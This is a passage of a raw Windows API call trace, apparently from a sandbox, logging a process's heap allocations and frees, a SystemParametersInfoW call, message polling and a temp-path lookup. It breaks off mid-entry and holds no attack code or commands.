RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0287.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0287.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0287.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0287.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0287.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0287.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0287.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0287.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0287.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0287.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0287.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0287.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0287.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0287.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0287.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0287.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0287.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0287.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0287.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0287.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0287.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0287.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0287.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0287.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0287.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0287.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0287.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0287.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0287.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0287.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0287.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0287.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0287.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0287.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0287.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0287.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0287.567] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0287.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0287.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0287.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0287.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0287.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0287.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0287.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0287.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0287.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0287.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0287.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0287.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0287.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0287.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0287.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0287.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0287.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0287.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0287.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0287.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0287.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0287.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0287.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0287.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0287.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0287.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0287.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0287.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0287.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0287.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0287.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0287.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0287.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0287.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0287.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0287.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0287.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0287.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0287.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0287.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0287.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0287.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0287.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0287.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0287.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0287.569] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0287.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0287.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0287.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0287.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e699c8 [0287.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e699c8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0287.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0287.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0287.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0287.569] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0287.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54738 | out: hHeap=0x970000) returned 1 [0287.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0287.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0287.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0287.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0287.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0287.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0287.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0287.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0287.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0287.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0287.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0287.570] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0287.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f157f0 [0287.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0287.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0287.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0287.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0287.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0287.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0287.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0287.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0287.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0287.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0287.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0287.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0287.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0287.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0287.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0287.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0287.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0287.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0287.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0287.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0287.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0287.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0287.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0287.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0287.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0287.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0287.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0287.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0287.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0287.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0287.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0287.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0287.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0287.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0287.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0287.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0287.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0287.664] FreeLibrary (hLibModule=0x750c0000) returned 1 [0287.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0287.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0287.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0287.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0287.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0287.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0287.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0287.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0287.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0287.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0287.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0287.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0287.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0287.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0287.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0287.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0287.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0287.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0287.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0287.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0287.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0287.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0287.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0287.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0287.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0287.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0287.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0287.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0287.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0287.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0287.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f155c8 [0287.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0287.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0287.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f157f0 | out: hHeap=0x970000) returned 1 [0287.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0287.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0287.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0287.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0287.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0287.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0287.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0287.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0287.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0287.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0287.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0287.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0287.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0287.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0287.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0287.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0287.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0287.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0287.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0287.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0287.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0287.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0287.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0287.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0287.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0287.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0287.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0287.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0287.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0287.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0287.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0287.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0287.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f155c8 | out: hHeap=0x970000) returned 1 [0287.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0287.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0287.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0287.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0287.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0287.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0287.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0287.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0287.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0287.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0287.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0287.667] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0287.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0287.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0287.667] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0287.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0287.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0287.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0287.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0287.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0287.667] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0287.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0287.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0287.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0287.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0287.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0287.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0287.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0287.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0287.668] HeapFree (in: 